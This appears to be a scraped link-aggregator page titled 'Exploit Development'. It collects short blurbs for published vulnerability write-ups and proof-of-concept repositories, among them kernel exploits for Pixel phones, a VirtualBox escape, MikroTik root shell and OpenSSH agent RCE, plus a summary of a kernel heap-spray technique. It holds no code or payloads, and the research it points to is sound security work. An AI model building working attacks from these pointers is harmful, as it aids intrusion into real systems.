Exploit Development

A kernel exploit for Pixel7/8 Pro with Android 14 - GitHub - 0x36/Pixel_GPU_Exploit: A kernel exploit for Pixel7/8 Pro with Android 14

Introduction Hi, I am Trung (xikhud). Last month, I joined Qrious Secure team as a new member, and my first target was to find and reproduce the security bugs that @bienpnn used at the Pwn2Own Vancouver 2023 to escape the VirtualBox VM. Since VirtualBox is an open-source software, I can just downloa...

It was the year of the Linux desktop 1978. Old yellowed computers were not yet old, nor yellowed. Digital Equipment Corporation released the first popular terminal to support a standardized in-band encoding for control functions, the VT100.

CPU vulnerabilities are a widespread problem, yet they are not well understood and are generally hard to mitigate. Some of these vulnerabilities affect nearly all modern processors, regardless of running software. This blog explores their impact on real-life systems.

Our goal at DFF is to reveal any threats on mobile devices, and that requires us to keep up to date with every single version of Android and iOS, including the beta and "Developer Preview" phases. Often, these are the under-the-hood, undocumented changes which have the real impact on opera

0x00-Preface

Contribute to mistymntncop/CVE-2023-2033 development by creating an account on GitHub.

In this guest blog from researcher Marcin Wiązowski, he details CVE-2023-21822 – a Use-After-Free (UAF) in win32kfull that could lead to a privilege escalation. The bug was reported through the ZDI program and later patched by Microsoft. Marcin has graciously provided this detailed write-up of

Earlier this year I was invited to give a talk at University of California San Diego (UCSD) for Nadia Heninger's CSE 127 ("Intro to Computer Security"). I chose to talk about modern exploit development, stepping through the process of finding and exploiting some of the memory corruption bugs that th...

Unpack the remote code execution vulnerability impacting the Microsoft Message Queueing service — CVE-2023-21554, a.k.a. QueueJumper.

By Mark Brand, Project Zero In mid-2022, Project Zero was provided with access to pre-production hardware implementing the ARM MTE specifi...

Exploiting a vulnerability in the io_uring subsystem of the Linux kernel.

IntroductionI’ve been doing some Linux kernel exploit development/study and vulnerability research off and on since last Fall and a few months ago I had some downtime on vacation to sit and challenge myself to write my first data-only exploit for a real bug that was exploited in kCTF. io_ring has be...

Introduction Every so often a piece of security research will generate a level of excitement and buzz that's palpable. Dan Kaminsky's DNS bug, Barnaby Jack's ATM Jackpotting, Chris Valasek and Charlie Miller's Jeep hacking escapades. There's something special about the overheard conversations, the ...

TLDR prctl PR_SET_VMA (PR_SET_VMA_ANON_NAME) can be used as a (possibly new!) heap spray method targeting the kmalloc-8 to kmalloc-96 caches. The sprayed object, anon_vma_name, is dynamically sized, and can range from larger than 4 bytes to a maximum of 84 bytes. The object can be easily allocated a...

POC of CVE-2023-35086 only DoS. Contribute to tin-z/CVE-2023-35086-POC development by creating an account on GitHub.

Recently, I was trying out various exploitation techniques against a Linux kernel vulnerability, CVE-2022-3910. After successfully writing an exploit which made use of DirtyCred to gain local privilege escalation, my mentor Billy asked me if it was possible to tweak my code to facilitate a container...

VulnCheck develops an exploit that gets a root shell on MikroTik RouterOS.

By Vignesh Rao Overview In this blog post, we describe a method to exploit an integer overflow in Apple WebKit due to a vulnerability resulting from incorrect range computations when optimizing Javascript code. This research was conducted along with Martin Saar in 2020. We show how to convert this i...

In this excerpt of a Trend Micro Vulnerability Research Service vulnerability report, Guy Lederfein and Lucas Miller of the Trend Micro Research Team detail a recently patched remote code execution vulnerability in Progress MOVEit Transfer. This bug was originally discovered by Trend Micro Vulnerabi

Introduction CVE-2021-38003 is a vulnerability that exists in the V8 Javascript engine. The vulnerability affects the Chrome browser before stable version 95.0.4638.69, and was disclosed in October 2021 in google’s chrome release blog, while the bug report was made public in February 2022. The vulne...

V8 Sandbox - Code Pointer Sandboxing Author: saelo@ First Published: December 2022 Last Updated: July 2023 Status: Living Doc Visibility: PUBLIC This document is part of the V8 Sandbox Project and discusses the design of code pointer sandboxing to ensure secure control-flow transfers into and ...

The Qualys Threat Research Unit (TRU) has discovered a remote code execution vulnerability in OpenSSH's forwarded ssh-agent. This vulnerability allows a remote attacker to potentially execute…